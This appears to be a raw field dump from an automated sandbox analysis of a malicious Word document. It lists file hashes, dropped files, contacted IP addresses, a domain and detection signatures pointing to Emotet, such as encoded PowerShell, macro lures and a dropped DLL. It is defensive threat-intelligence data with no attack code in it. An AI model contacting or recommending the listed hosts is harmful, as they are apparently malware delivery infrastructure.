31.0.0 Red Diamond
IR
337532
CloudBasic
18:10:14
08/01/2021
Doc.doc
defaultwindowsofficecookbook.jbs
Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
WINDOWS
16f391d60eff19aabb43225c85d5145c
58becf84bea5dafb9d46afc194a4eaf946fa4c72
af5c3952d0c7a7a2925c6086aa050dd076afc1adead3663dc2141087009a6d87
Microsoft Word document (32009/1) 54.23%
true
false
false
false
100
0
100
5
0
5
false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{99DD3073-AAC4-4BB8-A12E-BAAB271DD5EB}.tmp
false
CF70770B18EE4D2D3584E26882E961A9
B674900882E193830D40625F6FB3968665CF88F5
11491FBEEBBF8D1C6B421C310B38DA090923E2B20CF966E70AE7AE8B906C5833
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1AA7D61-551E-40AF-9919-E039C2A6E74E}.tmp
false
5D4D94EE7E06BBB0AF9584119797B23A
DBB111419C704F116EFA8E72471DD83E86E49677
4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
false
CEF28C6E4F49BB0DE2976E073BAB441E
CA58C8432E040057B717AC133A9265853586BA0D
1D4FA10D7A83016498AB2358804248BAF6817D661558040F362B1A354004C40D
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Doc.LNK
false
C38445A30D6C8B15D19CCC6F96CED1AB
5FC35945C876F1605C2864C6BF6090D75A5DD137
9C927546DD20294D9904134808A510BF562DB8FA4C29BE2C80DDE3875DEC98C5
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
false
071D4A911934095DE3D17DDC9112A372
5765B8D82EE7042EA3223FE74B8F7B8CE92977B0
3F7D6A8692933570421B2ABAA5D00299928FFAEB27FBD44CA64901D4DD018E2F
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
false
39EB3053A717C25AF84D576F6B2EBDD2
F6157079187E865C1BAADCC2014EF58440D449CA
CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CNLDNGQDOXTNQW5LTFBN.temp
false
2F954C783E9CD474F876CD96D4950B3C
5E872158635EA3B407AEEE7CCD1701B20DBD7DC2
63B0E7657CA6D348F80B4A75B33EAC54614B21FD92B963AB169297C0D39BDA4E
C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll
true
0BCAFFBDA4138F2EE2786CFD098C1DA9
3D6E52F126809C05E69F1D543B7F8D53435A8E17
5E9F4504B7E0938A2B2EB9A7F090BE9F4B1101AA3BE145A3B5895CB14BACD0EF
C:\Users\user\Desktop\~$Doc.doc
true
39EB3053A717C25AF84D576F6B2EBDD2
F6157079187E865C1BAADCC2014EF58440D449CA
CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
167.71.148.58
216.218.207.98
202.187.222.40
184.66.18.83
paulscomputing.com
true
216.218.207.98
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet